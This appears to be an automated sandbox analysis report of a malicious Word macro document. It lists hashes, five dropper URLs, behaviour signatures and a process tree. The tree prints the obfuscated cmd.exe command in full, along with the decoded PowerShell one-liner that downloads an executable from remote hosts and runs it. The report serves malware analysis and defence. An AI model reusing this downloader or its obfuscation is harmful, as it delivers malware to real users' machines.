Analysis

  • max time kernel
    112s
  • max time network
    91s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2022 20:32

General

  • Target

    a0f6ce6375c17dcd4052f315be17146c089c664a1552e0d1a3c3ecd1e8a6d6cf.doc

  • Size

    95KB

  • MD5

    186c67a706eb91c97ab9b550c5bd531b

  • SHA1

    35583941dec461c4045ecb4bfd0ebdd0e9a6c9de

  • SHA256

    a0f6ce6375c17dcd4052f315be17146c089c664a1552e0d1a3c3ecd1e8a6d6cf

  • SHA512

    fa772d641409088277fc9d51a2063ba55b25cb87fc9403f350a15c9cd0ec1ae9f6004cb6fbdae2ad60a9ed2dd480f119a824d772c659cb457ec7d35dd634f5b1

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sundownbodrum.com/J335NbN

exe.dropper

http://www.roteirobrasil.com/wp-includes/XEBv3PdHgZ

exe.dropper

http://rdabih.org/m7mnTYaIzL

exe.dropper

http://zavgroup.net/11D6PwFu

exe.dropper

http://stefanobaldini.net/DfSVLfsC6

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a0f6ce6375c17dcd4052f315be17146c089c664a1552e0d1a3c3ecd1e8a6d6cf.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1500
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\WiTAWFc\ivFAjJD\mZGnokr\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!""
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1564
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "$ifO='zwI';$MaG=new-object Net.WebClient;$IBL='http://sundownbodrum.com/J335NbN@http://www.roteirobrasil.com/wp-includes/XEBv3PdHgZ@http://rdabih.org/m7mnTYaIzL@http://zavgroup.net/11D6PwFu@http://stefanobaldini.net/DfSVLfsC6'.Split('@');$lCK='nWP';$SCK = '362';$FFY='mwV';$DQi=$env:temp+'\'+$SCK+'.exe';foreach($Cfn in $IBL){try{$MaG.DownloadFile($Cfn, $DQi);$cPU='bGT';If ((Get-Item $DQi).length -ge 80000) {Invoke-Item $DQi;$jGj='mwL';break;}}catch{}}$hzA='sTh';"
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1868

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1500-58-0x0000000000000000-mapping.dmp
    • memory/1500-60-0x000007FEFBF21000-0x000007FEFBF23000-memory.dmp
      Filesize

      8KB

    • memory/1564-65-0x0000000000000000-mapping.dmp
    • memory/1868-66-0x0000000000000000-mapping.dmp
    • memory/1868-68-0x000000006ABB0000-0x000000006B15B000-memory.dmp
      Filesize

      5.7MB

    • memory/1868-71-0x000000006ABB0000-0x000000006B15B000-memory.dmp
      Filesize

      5.7MB

    • memory/1868-70-0x0000000004B40000-0x0000000005191000-memory.dmp
      Filesize

      6.3MB

    • memory/1868-69-0x000000006ABB0000-0x000000006B15B000-memory.dmp
      Filesize

      5.7MB

    • memory/1924-64-0x0000000000000000-mapping.dmp
    • memory/1936-63-0x00000000005A6000-0x00000000005AA000-memory.dmp
      Filesize

      16KB

    • memory/1936-57-0x0000000075441000-0x0000000075443000-memory.dmp
      Filesize

      8KB

    • memory/1936-55-0x0000000070541000-0x0000000070543000-memory.dmp
      Filesize

      8KB

    • memory/1936-54-0x0000000072AC1000-0x0000000072AC4000-memory.dmp
      Filesize

      12KB

    • memory/1936-62-0x00000000005A6000-0x00000000005AA000-memory.dmp
      Filesize

      16KB

    • memory/1936-61-0x000000007152D000-0x0000000071538000-memory.dmp
      Filesize

      44KB

    • memory/1936-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1936-59-0x000000007152D000-0x0000000071538000-memory.dmp
      Filesize

      44KB

    • memory/1936-72-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1936-73-0x000000007152D000-0x0000000071538000-memory.dmp
      Filesize

      44KB